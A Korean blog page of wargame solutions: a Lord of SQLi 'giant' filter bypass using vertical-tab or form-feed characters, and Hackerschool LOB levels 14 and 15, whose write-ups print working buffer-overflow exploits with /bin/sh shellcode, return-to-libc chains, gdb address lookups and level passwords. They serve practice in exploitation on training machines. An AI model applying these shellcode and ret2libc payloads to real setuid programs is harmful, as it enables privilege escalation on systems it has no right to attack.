728x90
반응형
728x90
반응형
728x90
반응형

소스:

1
2
3
4
5
6
7
8
9
10
11
12
<?php 
  include "./config.php"
  login_chk(); 
  $db = dbconnect(); 
  if(strlen($_GET[shit])>1exit("No Hack ~_~"); 
  if(preg_match('/ |\n|\r|\t/i'$_GET[shit])) exit("HeHe"); 
  $query = "select 1234 from{$_GET[shit]}prob_giant where 1"
  echo "<hr>query : <strong>{$query}</strong><hr><br>"
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result[1234]) solve("giant"); 
  highlight_file(__FILE__); 
?>
cs

 

if(strlen($_GET[shit])>1) exit("No Hack ~_~"); 

 

shit의 길이가 1보다 크면 죽어버린다.

 

쿼리 값을 보면 from 과 prob_giant사이에 공백이 없는 것을 볼 수 있다. 

select 1234 from prob_giant where 1

 

 

 

 

 

 

공백을 넣는 방법에는

 

%09  (tab \t)

%0a  (linefeed \n)

%0b  (vertical tab)

%0c  (form feed)

%0d  (carriage return \r)

 

가 있는데

아래 구문에 의해서 몇개는 필터링 된다.

 

if(preg_match('/ |\n|\r|\t/i', $_GET[shit])) exit("HeHe"); 

 

 

 

 

 

\t \n \r이 아닌 %0b나 %0c를 입력해주면 풀린다.

728x90
반응형
728x90
반응형


해커스쿨 LOB LEVEL15 [giant -> assassin] 풀이


M4ndU
해커스쿨 LOB [giant -> assassin] 풀이입니다.


ID | giant

PW | one step closer

으로 로그인합니다.\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.


$ bash2


그리고


$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합시다.
login: giant

Password:

[giant@localhost giant]$ bash2

[giant@localhost giant]$ ls -l

total 16

-rwsr-sr-x    1 assassin assassin    12222 Mar 30  2010 assassin

-rw-r--r--    1 root     root          587 Mar 30  2010 assassin.c

[giant@localhost giant]$ cat assassin.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - assassin

        - no stack, no RTL

*/


#include <stdio.h>

#include <stdlib.h>


main(int argc, char *argv[])

{

        char buffer[40];


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        if(argv[1][47] == '\xbf')

        {

                printf("stack retbayed you!\n");

                exit(0);

        }


        if(argv[1][47] == '\x40')

        {

                printf("library retbayed you, too!!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);


        // buffer+sfp hunter

        memset(buffer, 0, 44);

}no stack, no RTL 이고 sfp도 0으로 초기화 합니다.


ret가 하는 일이 pop eip, jmp eip인데


리턴 주소를 다시 ret명령어의 주소로 덮어준다면 main함수의 프롤로그가

leave

ret

ret

와 같아겠죠 그러면 pop eip가 한번 더 되면서, 기존 리턴주소가 있던 자리에서 다음 4바이트에 있는 주소로 eip가 조작될 수 있습니다.


그럼 페이로드를 구성해보면


dummy[44]+&ret+&shellcode먼저 ret가 있는 주소를 구합니다.


[giant@localhost giant]$ gdb -q assassin

(gdb) disas main

Dump of assembler code for function main:

0x8048470 <main>:       push   %ebp

0x8048471 <main+1>:     mov    %esp,%ebp

(생략)

0x804851d <main+173>:   leave

0x804851e <main+174>:   ret

0x804851f <main+175>:   nop

End of assembler dump.0x0804851e이네요.


이제 쉘코드의 주소를 구합니다.

쉘코드는 환경변수를 이용하겠습니다.


[giant@localhost giant]$ mkdir tmp

[giant@localhost giant]$ cd tmp/

[giant@localhost tmp]$ export EGG=`python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

[giant@localhost tmp]$ echo 'int main() { printf("ADDR -> 0x%x\n", getenv("EGG")); } ' > getenv.c

[giant@localhost tmp]$ gcc getenv.c -o getenv

[giant@localhost tmp]$ ./getenv

ADDR -> 0xbffffe99ret | 0x0804851e
shellcode | 0xbffffe99

./assassin `python -c 'print "D"*44+"\x1e\x85\x04\x08"+"\x99\xfe\xff\xbf"'`


[giant@localhost giant]$ ./assassin `python -c 'print "D"*44+"\x1e\x85\x04\x08"+"\x99\xfe\xff\xbf"'`
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD숣?
bash$ my-pass
euid = 515
pushing me away성공! 다음레벨로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏ


728x90
반응형
728x90
반응형

 

해커스쿨 LOB LEVEL14 [bugbear -> giant] 풀이


M4ndU
해커스쿨 LOB [bugbear -> giant] 풀이입니다.


ID | bugbear

PW | new attacker

으로 로그인합니다.\xff 를 \x00으로 인식하는 오류를 피해 bash2를 사용합니다.


$ bash2


그리고


$ ls -l


를 이용해  어떤 파일과 어떤 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합시다.
login: bugbear

Password:

[bugbear@localhost bugbear]$ bash2

[bugbear@localhost bugbear]$ ls -l

total 20

-rwsr-sr-x    1 giant    giant       12933 Mar  9  2010 giant

-rw-r--r--    1 root     root          920 Mar 29  2010 giant.c

[bugbear@localhost bugbear]$ cat giant.c

/*

        The Lord of the BOF : The Fellowship of the BOF

        - giant

        - RTL2

*/


#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>


main(int argc, char *argv[])

{

        char buffer[40];

        FILE *fp;

        char *lib_addr, *execve_offset, *execve_addr;

        char *ret;


        if(argc < 2){

                printf("argv error\n");

                exit(0);

        }


        // gain address of execve

        fp = popen("/usr/bin/ldd /home/giant/assassin | /bin/grep libc | /bin/awk '{print $4}'", "r");

        fgets(buffer, 255, fp);

        sscanf(buffer, "(%x)", &lib_addr);

        fclose(fp);


        fp = popen("/usr/bin/nm /lib/libc.so.6 | /bin/grep __execve | /bin/awk '{print $1}'", "r");

        fgets(buffer, 255, fp);

        sscanf(buffer, "%x", &execve_offset);

        fclose(fp);


        execve_addr = lib_addr + (int)execve_offset;

        // end


        memcpy(&ret, &(argv[1][44]), 4);

        if(ret != execve_addr)

        {

                printf("You must use execve!\n");

                exit(0);

        }


        strcpy(buffer, argv[1]);

        printf("%s\n", buffer);

}이번에는 메인함수의 리턴주소가 execve함수의 주소이네요.
하지만 구지 execve를 통해 쉘을 따야 하는 것은 아닙니다. 메인함수의 리턴주소만 execve함수 주소로 해주고 execve의 리턴주소를 system함수 주소로 덮어주어 system함수를 통해 쉘을 딸 수도 있습니다.

그럼 execve(),system(),exit()의 주소를 구해줍니다.


[bugbear@localhost bugbear]$ mkdir tmp
[bugbear@localhost bugbear]$ cp giant tmp/
[bugbear@localhost bugbear]$ cd tmp/
[bugbear@localhost tmp]$ gdb giant -q
(gdb) b main
Breakpoint 1 at 0x8048566
(gdb) r
Starting program: /home/bugbear/tmp/giant

Breakpoint 1, 0x8048566 in main ()
(gdb) p execve
$1 = {<text variable, no debug info>} 0x400a9d48 <__execve>
(gdb) p system
$2 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
(gdb) p exit
$3 = {void (int)} 0x400391e0 <exit>


execve() 0x400a9d48
system() 0x40058ae0
exit() 0x400391e0


그리고 system()의 주소를 이용해서 "/bin/sh"의 주소도 구해줍니다.

echo 'int main(){long system = 0x40058ae0; while(memcmp((void *)system, "/bin/sh", 8)) system++; printf("%p\n", system);}' >getsystem.c


[bugbear@localhost tmp]$ echo 'int main(){long system = 0x40058ae0; while(memcmp((void *)system, "/bin/sh", 8)) system++; printf("%p\n", system);}' >getsystem.c
[bugbear@localhost tmp]$ gcc -o getsystem getsystem.c
[bugbear@localhost tmp]$ ./getsystem
0x400fbff9

&"/bin/sh" 0x400fbff9

필요한 주소를 모두 구했으니 페이로드를 구성합니다.
exit()은 system()의 리턴주소를 덮습니다.

dummy[44]+execve()[4]+system()[4]+exit()[4]+&"/bin/sh"[4]+&NULL[4]

./giant `python -c 'print "D"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xfc\xff\xff\xbf"'`

[bugbear@localhost tmp]$ ./giant `python -c 'print "D"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"'`
ldd: /home/giant/assassin: No such file or directory
You must use execve!

엇 execve()의 주소가 맞지 않는 것 처럼 문장이 출력되었습니다.
찾아보니 원인은 \x0a때문이었습니다.
""으로 감싸주어서 문자열 처리를 해준다면 해결이 된다고 합니다.


./giant "`python -c 'print "D"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xfc\xff\xff\xbf"'`"


[bugbear@localhost bugbear]$ ./giant "`python -c 'print "D"*44+"\x48\x9d\x0a\x40"+"\xe0\x8a\x05\x40"+"\xe0\x91\x03\x40"+"\xf9\xbf\x0f\x40"+"\xfc\xff\xff\xbf"'`"

DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDH?

@?@?@廈@??

bash$ my-pass

euid = 514

one step closer다음레벨로 가즈아ㅏㅏㅏㅏㅏㅏㅏㅏㅏㅏ


728x90
반응형

+ Recent posts